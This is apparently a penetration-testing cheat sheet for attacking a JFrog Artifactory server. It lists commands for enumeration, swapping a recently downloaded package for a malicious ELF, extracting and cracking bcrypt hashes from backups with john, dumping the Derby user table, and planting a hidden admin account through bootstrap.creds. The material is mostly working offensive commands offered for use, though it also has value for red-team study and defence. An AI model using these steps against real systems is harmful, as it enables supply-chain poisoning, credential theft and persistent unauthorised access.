Artifactory (8081)

Artifactory is a “binary repository manager” that stores software packages and other binaries. Other binary repository managers include Apache Archiva, SonaType Nexus, CloudRepo, or Cloudsmith.

- Enumerating Artifactory

ps aux | grep artifactory

If we’ve not yet gained access to the machine, we can try accessing the server externally from a web browser at port 8081, which is the default port for Artifactory’s web interface. If we have credentials we can try "Artifactory > Artifacts > upload a payload (malicious ELF) with the same name as an existing one that a target user has downloaded recently." and wait for a target to load it.

- Compromising Artifactory Backups

/{ARTIFACTORY FOLDER}/var/backup/access

We can inspect the user entries by reading the contents of one of these files, example:

cat /opt/jfrog/artifactory/var/backup/access access.backup.20200730120454.json

We can copy the bcrypt hashes and try cracking them

sudo john derbyhash.txt --wordlist=/usr/share/wordlists/rockyou.txt

- Compromising Artifactory’s Database

Artifactory contains its own version of Java and we can use it to run the Derby connection utilities and connect to the database.

sudo /opt/jfrog/artifactory/app/third-party/java/bin/java -jar /opt/derby/db-derby-10.15.1.3-bin/lib/derbyrun.jar ij

connect 'jdbc:derby:/tmp/hackeddb/derby';

select * from access_users;

- Adding a Secondary Artifactory Admin Account

First we navigate to the /opt/jfrog/artifactory/var/etc/access folder and create a creds file:

sudo bash -c 'echo "haxmin@*=haxhaxhax" > /opt/jfrog/artifactory/var/etc/access/bootstrap.creds'

This will create a new user called “haxmin” with a password of “haxhaxhax”. Next:

sudo chmod 600 /opt/jfrog/artifactory/var/etc/access/bootstrap.creds

And then restart the Artifactory process:

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl stop

sudo /opt/jfrog/artifactory/app/bin/artifactoryctl start